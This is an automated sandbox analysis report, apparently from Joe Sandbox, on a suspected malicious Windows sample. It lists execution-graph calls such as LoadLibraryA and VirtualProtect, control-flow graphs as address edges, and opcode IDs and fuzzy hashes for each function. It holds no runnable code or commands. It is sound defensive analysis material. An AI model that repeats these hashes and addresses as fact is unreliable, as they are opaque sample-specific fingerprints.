                                                                                                                      execution_graph 15470 7ffd9b8a09c8 15473 7ffd9b8a09d1 15470->15473 15471 7ffd9b8a097d FreeConsole 15472 7ffd9b8a099e 15471->15472 15473->15471 15474 7ffd9b8a0a4b 15473->15474 15485 7ffd9b8a05b8 15474->15485 15476 7ffd9b8a0aa4 15477 7ffd9b8a05b8 LoadLibraryA 15476->15477 15478 7ffd9b8a0aed 15477->15478 15479 7ffd9b8a05b8 LoadLibraryA 15478->15479 15480 7ffd9b8a0b02 15479->15480 15481 7ffd9b8a05b8 LoadLibraryA 15480->15481 15482 7ffd9b8a0b6f 15481->15482 15483 7ffd9b8a05b8 LoadLibraryA 15482->15483 15484 7ffd9b8a0b84 15483->15484 15487 7ffd9b8a1050 15485->15487 15486 7ffd9b8a10bf 15486->15476 15487->15486 15488 7ffd9b8a1200 LoadLibraryA 15487->15488 15489 7ffd9b8a1254 15488->15489 15489->15476 15456 7ffd9b8a18b9 15461 7ffd9b8a1050 15456->15461 15458 7ffd9b8a18fa 15459 7ffd9b8a1050 LoadLibraryA 15458->15459 15460 7ffd9b8a192e 15459->15460 15464 7ffd9b8a1066 15461->15464 15462 7ffd9b8a10bf 15462->15458 15463 7ffd9b8a1200 LoadLibraryA 15465 7ffd9b8a1254 15463->15465 15464->15462 15464->15463 15465->15458 15466 7ffd9b8a1654 15467 7ffd9b8a165d VirtualProtect 15466->15467 15469 7ffd9b8a1721 15467->15469

                                                                                                                      Executed Functions

                                                                                                                      Function 00007FFD9B8A1F88 Relevance: 3.2, Strings: 2, Instructions: 686COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 81 7ffd9b8a1f88-7ffd9b8a35f1 call 7ffd9b8a34b0 88 7ffd9b8a3614-7ffd9b8a3623 81->88 89 7ffd9b8a3625-7ffd9b8a363f call 7ffd9b8a34b0 call 7ffd9b8a3500 88->89 90 7ffd9b8a35f3-7ffd9b8a3609 call 7ffd9b8a34b0 call 7ffd9b8a3500 88->90 99 7ffd9b8a360b-7ffd9b8a3612 90->99 100 7ffd9b8a3640-7ffd9b8a3690 90->100 99->88 103 7ffd9b8a369c-7ffd9b8a36d3 100->103 104 7ffd9b8a3692-7ffd9b8a3697 call 7ffd9b8a2188 100->104 107 7ffd9b8a36d9-7ffd9b8a36e4 103->107 108 7ffd9b8a38cf-7ffd9b8a3939 103->108 104->103 109 7ffd9b8a36e6-7ffd9b8a36f4 107->109 110 7ffd9b8a3758-7ffd9b8a375d 107->110 133 7ffd9b8a3956-7ffd9b8a3980 108->133 134 7ffd9b8a393b-7ffd9b8a3941 108->134 109->108 114 7ffd9b8a36fa-7ffd9b8a3709 109->114 111 7ffd9b8a37d0-7ffd9b8a37da 110->111 112 7ffd9b8a375f-7ffd9b8a376b 110->112 119 7ffd9b8a37fc-7ffd9b8a3804 111->119 120 7ffd9b8a37dc-7ffd9b8a37e9 call 7ffd9b8a21a8 111->120 112->108 115 7ffd9b8a3771-7ffd9b8a3784 112->115 117 7ffd9b8a370b-7ffd9b8a373b 114->117 118 7ffd9b8a373d-7ffd9b8a3748 114->118 122 7ffd9b8a3807-7ffd9b8a3812 115->122 117->118 127 7ffd9b8a3789-7ffd9b8a378c 117->127 118->108 124 7ffd9b8a374e-7ffd9b8a3756 118->124 119->122 135 7ffd9b8a37ee-7ffd9b8a37fa 120->135 122->108 126 7ffd9b8a3818-7ffd9b8a3828 122->126 124->109 124->110 126->108 130 7ffd9b8a382e-7ffd9b8a383b 126->130 131 7ffd9b8a378e-7ffd9b8a379e 127->131 132 7ffd9b8a37a2-7ffd9b8a37aa 127->132 130->108 136 7ffd9b8a3841-7ffd9b8a3861 130->136 131->132 132->108 137 7ffd9b8a37b0-7ffd9b8a37cf 132->137 138 7ffd9b8a3981-7ffd9b8a39d5 134->138 139 7ffd9b8a3943-7ffd9b8a3954 134->139 135->119 136->108 146 7ffd9b8a3863-7ffd9b8a3872 136->146 153 7ffd9b8a39d7-7ffd9b8a39e7 138->153 154 7ffd9b8a39e9-7ffd9b8a3a21 138->154 139->133 139->134 148 7ffd9b8a38bd-7ffd9b8a38ce 146->148 149 7ffd9b8a3874-7ffd9b8a387f 146->149 149->148 155 7ffd9b8a3881-7ffd9b8a38b8 call 7ffd9b8a21a8 149->155 153->153 153->154 160 7ffd9b8a3a78-7ffd9b8a3a7f 154->160 161 7ffd9b8a3a23-7ffd9b8a3a29 154->161 155->148 163 7ffd9b8a3ac2-7ffd9b8a3aeb 160->163 164 7ffd9b8a3a81-7ffd9b8a3a82 160->164 161->160 165 7ffd9b8a3a2b-7ffd9b8a3a2c 161->165 167 7ffd9b8a3a85-7ffd9b8a3a88 164->167 168 7ffd9b8a3a2f-7ffd9b8a3a32 165->168 169 7ffd9b8a3a8a-7ffd9b8a3a9b 167->169 170 7ffd9b8a3aec-7ffd9b8a3b01 167->170 168->170 172 7ffd9b8a3a38-7ffd9b8a3a45 168->172 173 7ffd9b8a3ab9-7ffd9b8a3ac0 169->173 174 7ffd9b8a3a9d-7ffd9b8a3aa3 169->174 181 7ffd9b8a3b0b-7ffd9b8a3b38 170->181 182 7ffd9b8a3b03-7ffd9b8a3b0a 170->182 175 7ffd9b8a3a47-7ffd9b8a3a6e 172->175 176 7ffd9b8a3a71-7ffd9b8a3a76 172->176 173->163 173->167 174->170 177 7ffd9b8a3aa5-7ffd9b8a3ab5 174->177 175->176 176->160 176->168 177->173 182->181
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: d$L_H
                                                                                                                      • API String ID: 0-2890412271
                                                                                                                      • Opcode ID: 2929f90173fa32a77efc3d7f7d0767f822f0e38beed85f303676cd7b8b8a5d7d
                                                                                                                      • Instruction ID: efc315be3506ba6cb0dbb590cace1f9b4ad5d8695d7daf783ab70b589d66195d
                                                                                                                      • Opcode Fuzzy Hash: 2929f90173fa32a77efc3d7f7d0767f822f0e38beed85f303676cd7b8b8a5d7d
                                                                                                                      • Instruction Fuzzy Hash: 64126330A0DA494FE76CDF6894A157177E0EF4A310B1542BAD49EC71ABEE28F8438391
                                                                                                                      Function 00007FFD9B8AEF47 Relevance: 2.4, Strings: 1, Instructions: 1115COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 185 7ffd9b8aef47-7ffd9b8aef69 187 7ffd9b8aef6f-7ffd9b8af173 185->187 212 7ffd9b8af175-7ffd9b8af1b6 187->212 213 7ffd9b8af1d3-7ffd9b8af1d9 187->213 214 7ffd9b8af1db-7ffd9b8af206 213->214 215 7ffd9b8af223-7ffd9b8af23f call 7ffd9b8aa080 213->215 217 7ffd9b8af28c-7ffd9b8af299 214->217 218 7ffd9b8af20c-7ffd9b8af21f 214->218 223 7ffd9b8af260-7ffd9b8af26f 215->223 224 7ffd9b8af241-7ffd9b8af248 215->224 225 7ffd9b8af29b-7ffd9b8af29d 217->225 226 7ffd9b8af29e-7ffd9b8af2e3 217->226 218->215 229 7ffd9b8af2f0-7ffd9b8af344 call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 223->229 230 7ffd9b8af271-7ffd9b8af28b call 7ffd9b8a6320 223->230 224->223 225->226 231 7ffd9b8af419-7ffd9b8af473 226->231 232 7ffd9b8af2e9-7ffd9b8af2ed 226->232 229->231 246 7ffd9b8af34a-7ffd9b8af3a2 229->246 241 7ffd9b8af479-7ffd9b8af4ce call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 231->241 242 7ffd9b8af52e-7ffd9b8af539 231->242 232->229 241->242 266 7ffd9b8af4d0-7ffd9b8af4f4 241->266 250 7ffd9b8af53b-7ffd9b8af53d 242->250 251 7ffd9b8af53e-7ffd9b8af55f 242->251 246->231 249 7ffd9b8af3a4-7ffd9b8af3f0 call 7ffd9b8aaee0 246->249 249->231 260 7ffd9b8af3f2-7ffd9b8af418 249->260 250->251 257 7ffd9b8af5a9-7ffd9b8af5fc call 7ffd9b8aa080 * 2 call 7ffd9b8ac1e0 251->257 258 7ffd9b8af561-7ffd9b8af58c 251->258 280 7ffd9b8af615-7ffd9b8af617 257->280 281 7ffd9b8af5fe-7ffd9b8af60b 257->281 261 7ffd9b8af74e-7ffd9b8af75b 258->261 262 7ffd9b8af592-7ffd9b8af5a6 258->262 272 7ffd9b8af760-7ffd9b8af761 261->272 262->257 269 7ffd9b8af4f6-7ffd9b8af506 266->269 270 7ffd9b8af522-7ffd9b8af52d 266->270 269->242 271 7ffd9b8af508-7ffd9b8af51f 269->271 271->270 274 7ffd9b8af765-7ffd9b8af774 272->274 275 7ffd9b8af763 272->275 282 7ffd9b8af777-7ffd9b8af779 274->282 275->274 278 7ffd9b8af7a5-7ffd9b8af7af 275->278 283 7ffd9b8af7b5-7ffd9b8af7c1 278->283 284 7ffd9b8af7b1-7ffd9b8af7b2 278->284 286 7ffd9b8af69d-7ffd9b8af6af 280->286 287 7ffd9b8af61d-7ffd9b8af640 call 7ffd9b8a7900 call 7ffd9b8a7fe0 280->287 281->280 290 7ffd9b8af60d-7ffd9b8af613 281->290 288 7ffd9b8af77b-7ffd9b8af7a4 282->288 289 7ffd9b8af7c3-7ffd9b8af7da call 7ffd9b8a5f80 call 7ffd9b8a66e0 282->289 283->289 284->283 295 7ffd9b8af6c1 286->295 296 7ffd9b8af6b1-7ffd9b8af6bf 286->296 287->286 288->278 292 7ffd9b8af869 288->292 289->292 310 7ffd9b8af7e0-7ffd9b8af7ee 289->310 290->280 301 7ffd9b8af86e-7ffd9b8af87b 292->301 300 7ffd9b8af6c3-7ffd9b8af6c8 295->300 296->300 305 7ffd9b8af6d7-7ffd9b8af6ef call 7ffd9b8ace80 300->305 306 7ffd9b8af6ca-7ffd9b8af6d5 call 7ffd9b8a0188 300->306 307 7ffd9b8af8bd-7ffd9b8af8e9 301->307 308 7ffd9b8af87d-7ffd9b8af88d 301->308 305->272 324 7ffd9b8af6f1-7ffd9b8af6f6 305->324 306->305 326 7ffd9b8af8ef-7ffd9b8af8f1 307->326 312 7ffd9b8af88f-7ffd9b8af8a3 308->312 313 7ffd9b8af88e 308->313 316 7ffd9b8af85f-7ffd9b8af868 310->316 317 7ffd9b8af7f0-7ffd9b8af7f2 310->317 322 7ffd9b8af8a5 312->322 313->312 317->301 323 7ffd9b8af7f4 317->323 325 7ffd9b8af8a7-7ffd9b8af8bb 322->325 322->326 327 7ffd9b8af7f6-7ffd9b8af7ff 323->327 328 7ffd9b8af83a-7ffd9b8af847 323->328 324->282 334 7ffd9b8af6f8-7ffd9b8af726 call 7ffd9b8a6320 call 7ffd9b8a5f80 324->334 325->307 332 7ffd9b8af909 326->332 333 7ffd9b8af8f3-7ffd9b8af907 326->333 330 7ffd9b8af858-7ffd9b8af85e 327->330 331 7ffd9b8af801-7ffd9b8af81d 327->331 328->292 335 7ffd9b8af849-7ffd9b8af857 328->335 330->316 331->313 339 7ffd9b8af81f-7ffd9b8af824 331->339 337 7ffd9b8af90b-7ffd9b8af910 332->337 333->337 334->261 350 7ffd9b8af728-7ffd9b8af74d 334->350 335->330 340 7ffd9b8af915-7ffd9b8af92f 337->340 341 7ffd9b8af912-7ffd9b8af913 337->341 339->322 343 7ffd9b8af826-7ffd9b8af838 call 7ffd9b8a6320 339->343 344 7ffd9b8af99a-7ffd9b8af9b3 340->344 345 7ffd9b8af931-7ffd9b8af980 call 7ffd9b8aa080 call 7ffd9b8ac1e0 340->345 341->340 343->328 345->344 357 7ffd9b8af982-7ffd9b8af998 345->357 357->344
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4W_H
                                                                                                                      • API String ID: 0-1926889702
                                                                                                                      • Opcode ID: fcd977fbc2fba0d8ada916d76028a4f0c79eb7164912ae3ca89e3dc82379e2d6
                                                                                                                      • Instruction ID: 5bdae4ead6074b0ce182ee2c2a0cb33223e8ad6017e202e67e56f0717ac6d92e
                                                                                                                      • Opcode Fuzzy Hash: fcd977fbc2fba0d8ada916d76028a4f0c79eb7164912ae3ca89e3dc82379e2d6
                                                                                                                      • Instruction Fuzzy Hash: 98724830A1DB4E8FE768DB68C4A45B5B7E1FF99300F0141BED489C72A6DE34A942C791
                                                                                                                      Function 00007FFD9B8AD925 Relevance: 2.0, Instructions: 1950COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b1726345555d7a66c67f9b5327cdf89640311cb21fd54aad7774e9a8546da86
                                                                                                                      • Instruction ID: b60f4f187e24454304af5faf1b64aefe68c3d73eaa0e78878f9e5af4ae65f1b2
                                                                                                                      • Opcode Fuzzy Hash: 0b1726345555d7a66c67f9b5327cdf89640311cb21fd54aad7774e9a8546da86
                                                                                                                      • Instruction Fuzzy Hash: FCD2BC3070DB494FD369DB68C4A04B5B7E2FF89301B1549BEE48AC72A6DE34E946C781
                                                                                                                      Function 00007FFD9B8A30F8 Relevance: 1.7, Strings: 1, Instructions: 499COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 870 7ffd9b8a30f8-7ffd9b8a317e 875 7ffd9b8a33f6-7ffd9b8a3429 870->875 876 7ffd9b8a3184-7ffd9b8a31a8 870->876 883 7ffd9b8a342b-7ffd9b8a3432 875->883 884 7ffd9b8a3433-7ffd9b8a3438 875->884 882 7ffd9b8a31af-7ffd9b8a31ba 876->882 888 7ffd9b8a31bc-7ffd9b8a31e1 882->888 883->884 886 7ffd9b8a3458 884->886 887 7ffd9b8a3439-7ffd9b8a344e 884->887 889 7ffd9b8a345c-7ffd9b8a3462 886->889 894 7ffd9b8a3450-7ffd9b8a3452 887->894 895 7ffd9b8a3482-7ffd9b8a34b1 887->895 901 7ffd9b8a31e3-7ffd9b8a31f4 call 7ffd9b8a20b8 888->901 892 7ffd9b8a3471-7ffd9b8a3481 889->892 893 7ffd9b8a3464-7ffd9b8a3470 889->893 893->892 894->889 896 7ffd9b8a3454-7ffd9b8a3457 call 7ffd9b8a2188 894->896 906 7ffd9b8a34b4-7ffd9b8a34ea 895->906 896->886 905 7ffd9b8a31f9-7ffd9b8a3210 901->905 909 7ffd9b8a3272-7ffd9b8a3285 905->909 906->906 907 7ffd9b8a34ec 906->907 910 7ffd9b8a3287-7ffd9b8a3289 909->910 911 7ffd9b8a3212-7ffd9b8a3224 call 7ffd9b8a2ec0 * 2 909->911 912 7ffd9b8a32e2-7ffd9b8a32f5 910->912 921 7ffd9b8a3229-7ffd9b8a322b call 7ffd9b8a2ec8 911->921 914 7ffd9b8a32f7-7ffd9b8a32f9 912->914 915 7ffd9b8a328b-7ffd9b8a32e0 call 7ffd9b8a2ec0 * 2 call 7ffd9b8a0208 912->915 917 7ffd9b8a339e-7ffd9b8a33b1 914->917 915->912 922 7ffd9b8a33b7-7ffd9b8a33f5 917->922 923 7ffd9b8a32fe-7ffd9b8a3330 call 7ffd9b8a2ec0 917->923 930 7ffd9b8a3230-7ffd9b8a3270 921->930 932 7ffd9b8a334a-7ffd9b8a334b 923->932 933 7ffd9b8a3332-7ffd9b8a3348 923->933 930->909 936 7ffd9b8a334d-7ffd9b8a336c call 7ffd9b8a1f88 932->936 933->936 943 7ffd9b8a3371-7ffd9b8a3397 call 7ffd9b8a2190 936->943 945 7ffd9b8a339c 943->945 945->917
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fish
                                                                                                                      • API String ID: 0-1064584243
                                                                                                                      • Opcode ID: 98b5c35df671bb81269c839f09be62eaf6b221be1393b08b9fe5767cc8fc195e
                                                                                                                      • Instruction ID: db59cde0fe6a687090c7e7e0e9a436b3dbad98510c1852b8cd65538735861e2c
                                                                                                                      • Opcode Fuzzy Hash: 98b5c35df671bb81269c839f09be62eaf6b221be1393b08b9fe5767cc8fc195e
                                                                                                                      • Instruction Fuzzy Hash: 4CD15B31B1EB4E0FE76DAB6898255B977E1EF59210B05417EE08BC31E3DD28A9028391
                                                                                                                      Function 00007FFD9B8AAFA1 Relevance: 1.6, Instructions: 1595COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1055 7ffd9b8aafa1-7ffd9b8aafdb 1057 7ffd9b8ab06c-7ffd9b8ab07f 1055->1057 1058 7ffd9b8aafe1-7ffd9b8ab018 call 7ffd9b8aa080 call 7ffd9b8a5f80 1055->1058 1063 7ffd9b8ab0c1-7ffd9b8ab0fa call 7ffd9b8a5f80 call 7ffd9b8a66e0 1057->1063 1064 7ffd9b8ab081-7ffd9b8ab089 1057->1064 1066 7ffd9b8ab01e-7ffd9b8ab026 1058->1066 1074 7ffd9b8ab166-7ffd9b8ab187 1063->1074 1075 7ffd9b8ab0fc-7ffd9b8ab10e 1063->1075 1064->1066 1066->1057 1069 7ffd9b8ab028-7ffd9b8ab046 1066->1069 1069->1057 1071 7ffd9b8ab048-7ffd9b8ab06b 1069->1071 1078 7ffd9b8ab18a 1074->1078 1075->1078 1079 7ffd9b8ab110 1075->1079 1081 7ffd9b8ab18b-7ffd9b8ab199 1078->1081 1082 7ffd9b8ab156-7ffd9b8ab165 1079->1082 1083 7ffd9b8ab112-7ffd9b8ab11a 1079->1083 1086 7ffd9b8ab19b-7ffd9b8ab19e 1081->1086 1087 7ffd9b8ab1e3-7ffd9b8ab205 call 7ffd9b8aa080 1081->1087 1083->1081 1085 7ffd9b8ab11c-7ffd9b8ab121 1083->1085 1088 7ffd9b8ab123-7ffd9b8ab144 call 7ffd9b8a6320 1085->1088 1089 7ffd9b8ab1a2-7ffd9b8ab1c6 1085->1089 1086->1089 1091 7ffd9b8ab263-7ffd9b8ab271 1087->1091 1097 7ffd9b8ab207-7ffd9b8ab219 1087->1097 1088->1074 1098 7ffd9b8ab146-7ffd9b8ab154 1088->1098 1090 7ffd9b8ab1cc-7ffd9b8ab1df 1089->1090 1089->1091 1090->1087 1099 7ffd9b8ab276-7ffd9b8ab294 1091->1099 1100 7ffd9b8ab273-7ffd9b8ab275 1091->1100 1103 7ffd9b8ab295-7ffd9b8ab299 1097->1103 1104 7ffd9b8ab21b 1097->1104 1098->1082 1099->1103 1100->1099 1107 7ffd9b8ab29b-7ffd9b8ab2c6 1103->1107 1108 7ffd9b8ab2e3-7ffd9b8ab323 call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 1103->1108 1105 7ffd9b8ab21d-7ffd9b8ab23b call 7ffd9b8a6320 1104->1105 1106 7ffd9b8ab261-7ffd9b8ab262 1104->1106 1105->1091 1115 7ffd9b8ab23d-7ffd9b8ab260 1105->1115 1110 7ffd9b8ab3bc-7ffd9b8ab3cf 1107->1110 1111 7ffd9b8ab2cc-7ffd9b8ab2e0 1107->1111 1108->1110 1130 7ffd9b8ab329-7ffd9b8ab35c 1108->1130 1119 7ffd9b8ab411 1110->1119 1120 7ffd9b8ab3d1-7ffd9b8ab3e6 1110->1120 1111->1108 1115->1106 1123 7ffd9b8ab412-7ffd9b8ab419 1119->1123 1124 7ffd9b8ab3e8-7ffd9b8ab3fe 1120->1124 1125 7ffd9b8ab41b-7ffd9b8ab41e 1120->1125 1123->1125 1124->1123 1129 7ffd9b8ab400-7ffd9b8ab410 1124->1129 1127 7ffd9b8ab420-7ffd9b8ab430 1125->1127 1128 7ffd9b8ab432-7ffd9b8ab43e 1125->1128 1131 7ffd9b8ab44e-7ffd9b8ab457 1127->1131 1128->1131 1132 7ffd9b8ab440-7ffd9b8ab44b 1128->1132 1129->1131 1136 7ffd9b8ab3a5-7ffd9b8ab3ae 1130->1136 1137 7ffd9b8ab35e-7ffd9b8ab3a3 1130->1137 1134 7ffd9b8ab4c8-7ffd9b8ab4d5 1131->1134 1135 7ffd9b8ab459-7ffd9b8ab45b 1131->1135 1132->1131 1139 7ffd9b8ab4d7-7ffd9b8ab523 call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 1134->1139 1135->1139 1140 7ffd9b8ab45d 1135->1140 1138 7ffd9b8ab3b0-7ffd9b8ab3bb 1136->1138 1137->1138 1148 7ffd9b8ab629-7ffd9b8ab65a 1139->1148 1160 7ffd9b8ab529-7ffd9b8ab544 1139->1160 1142 7ffd9b8ab45f-7ffd9b8ab477 call 7ffd9b8a6320 1140->1142 1143 7ffd9b8ab4a3-7ffd9b8ab4c7 1140->1143 1143->1134 1143->1148 1161 7ffd9b8ab65c-7ffd9b8ab687 1148->1161 1162 7ffd9b8ab6a4-7ffd9b8ab6e6 call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 1148->1162 1163 7ffd9b8ab546-7ffd9b8ab549 1160->1163 1164 7ffd9b8ab59d-7ffd9b8ab5a6 1160->1164 1165 7ffd9b8ab68d-7ffd9b8ab6a3 1161->1165 1166 7ffd9b8ab81e-7ffd9b8ab873 1161->1166 1162->1166 1192 7ffd9b8ab6ec-7ffd9b8ab70a 1162->1192 1168 7ffd9b8ab54b-7ffd9b8ab56b 1163->1168 1169 7ffd9b8ab5ca-7ffd9b8ab5db 1163->1169 1164->1148 1170 7ffd9b8ab5a8-7ffd9b8ab5c9 1164->1170 1165->1162 1188 7ffd9b8ab946-7ffd9b8ab951 1166->1188 1189 7ffd9b8ab879-7ffd9b8ab8ce call 7ffd9b8aa080 * 2 call 7ffd9b8a5f80 1166->1189 1172 7ffd9b8ab5dc-7ffd9b8ab5f0 call 7ffd9b8aaa50 1168->1172 1173 7ffd9b8ab56d-7ffd9b8ab572 1168->1173 1169->1172 1170->1169 1177 7ffd9b8ab5f3-7ffd9b8ab5ff 1172->1177 1173->1177 1178 7ffd9b8ab574-7ffd9b8ab598 call 7ffd9b8a6320 1173->1178 1177->1148 1182 7ffd9b8ab601-7ffd9b8ab628 1177->1182 1178->1164 1198 7ffd9b8ab956-7ffd9b8ab99b 1188->1198 1199 7ffd9b8ab953-7ffd9b8ab955 1188->1199 1189->1188 1224 7ffd9b8ab8d0-7ffd9b8ab8fb 1189->1224 1192->1166 1193 7ffd9b8ab710-7ffd9b8ab72a 1192->1193 1196 7ffd9b8ab72c-7ffd9b8ab72f 1193->1196 1197 7ffd9b8ab783 1193->1197 1201 7ffd9b8ab7b0-7ffd9b8ab7f2 call 7ffd9b8aaa50 1196->1201 1202 7ffd9b8ab731-7ffd9b8ab74a 1196->1202 1203 7ffd9b8ab785-7ffd9b8ab78a 1197->1203 1204 7ffd9b8ab7f4 1197->1204 1210 7ffd9b8aba25-7ffd9b8aba37 1198->1210 1211 7ffd9b8ab9a1-7ffd9b8ab9e1 call 7ffd9b8aa080 call 7ffd9b8a5f80 1198->1211 1199->1198 1201->1204 1208 7ffd9b8ab765-7ffd9b8ab777 1202->1208 1209 7ffd9b8ab74c-7ffd9b8ab763 1202->1209 1212 7ffd9b8ab80b-7ffd9b8ab81d 1203->1212 1213 7ffd9b8ab78c-7ffd9b8ab7ab call 7ffd9b8a6320 1203->1213 1204->1166 1207 7ffd9b8ab7f6-7ffd9b8ab809 1204->1207 1207->1212 1215 7ffd9b8ab77b-7ffd9b8ab781 1208->1215 1209->1215 1227 7ffd9b8aba79-7ffd9b8abaee call 7ffd9b8a6f10 1210->1227 1228 7ffd9b8aba39-7ffd9b8aba77 1210->1228 1211->1210 1235 7ffd9b8ab9e3-7ffd9b8ab9fc call 7ffd9b8a8108 1211->1235 1213->1201 1215->1197 1225 7ffd9b8ab93a-7ffd9b8ab945 1224->1225 1226 7ffd9b8ab8fd-7ffd9b8ab90f 1224->1226 1226->1188 1231 7ffd9b8ab911-7ffd9b8ab937 1226->1231 1245 7ffd9b8abbe9-7ffd9b8abbf3 1227->1245 1228->1227 1231->1225 1240 7ffd9b8aba01-7ffd9b8aba11 1235->1240 1242 7ffd9b8aba13-7ffd9b8aba24 1240->1242 1246 7ffd9b8abbf9-7ffd9b8abbff 1245->1246 1247 7ffd9b8abaf3-7ffd9b8abafe 1245->1247 1248 7ffd9b8abc00-7ffd9b8abd87 1247->1248 1249 7ffd9b8abb04-7ffd9b8abb1b 1247->1249 1251 7ffd9b8abb86-7ffd9b8abbbe 1249->1251 1252 7ffd9b8abb1d-7ffd9b8abb4d 1249->1252 1256 7ffd9b8abbc0-7ffd9b8abbdc call 7ffd9b8a8820 1251->1256 1265 7ffd9b8abb6a-7ffd9b8abb6c 1252->1265 1266 7ffd9b8abb4f-7ffd9b8abb68 1252->1266 1261 7ffd9b8abbe1-7ffd9b8abbe6 1256->1261 1261->1245 1267 7ffd9b8abb6f-7ffd9b8abb7c 1265->1267 1266->1267 1267->1261 1270 7ffd9b8abb7e-7ffd9b8abb7f 1267->1270 1270->1251
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 63b189eb0726bfb394c12890f678794560ed94246a522de477c48df7f813b3ca
                                                                                                                      • Instruction ID: 4714f2a4f5916393b7e7788f6a13af8e0fd4ad4bf8390f520a634f763078ed35
                                                                                                                      • Opcode Fuzzy Hash: 63b189eb0726bfb394c12890f678794560ed94246a522de477c48df7f813b3ca
                                                                                                                      • Instruction Fuzzy Hash: A6B24A3061EB8A4FD719DF68C4A04A47BF1FF9A300B1545BED08AC72B6DA38E946C751
                                                                                                                      Function 00007FFD9B8A30F0 Relevance: 1.6, Instructions: 1579COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a567802b0df2d70ed65b2832ad9bedeea2c44426cc850fece5a42caa48eafd0b
                                                                                                                      • Instruction ID: cac7d8db7a78b056e14c548ad9d7485aa4cdc1ce7ac8a917ffdf6fac474895d0
                                                                                                                      • Opcode Fuzzy Hash: a567802b0df2d70ed65b2832ad9bedeea2c44426cc850fece5a42caa48eafd0b
                                                                                                                      • Instruction Fuzzy Hash: 67B28530A0EA5A4FE769CB24C4612B577E1EF99310F1541BDD48E8B5E3DE28A946CBC0
                                                                                                                      Function 00007FFD9B8B37E0 Relevance: .8, Instructions: 842COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1807414888.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8a0000_NdYuOgHbM9.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f6a2df3202b681e8e6dac0b36c9da8f171f455be570fc003c51db876ccb1998b
                                                                                                                      • Instruction ID: bbd2722ecdeb0cdb246d8a9e869d77e81878a34358031cc4eebe95292e65219d
                                                                                                                      • Opcode Fuzzy Hash: f6a2df3202b681e8e6dac0b36c9da8f171f455be570fc003c51db876ccb1998b
                                                                                                                      • Instruction Fuzzy Hash: 6942B330B19A4E4FEBA8DF68C4616B973E1FF48301F514579D45EC36E6DE28B9028B81
                                                                                                                      Function 00007FFD9B8A7AF0 Relevance: .8, Instructions: 755COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
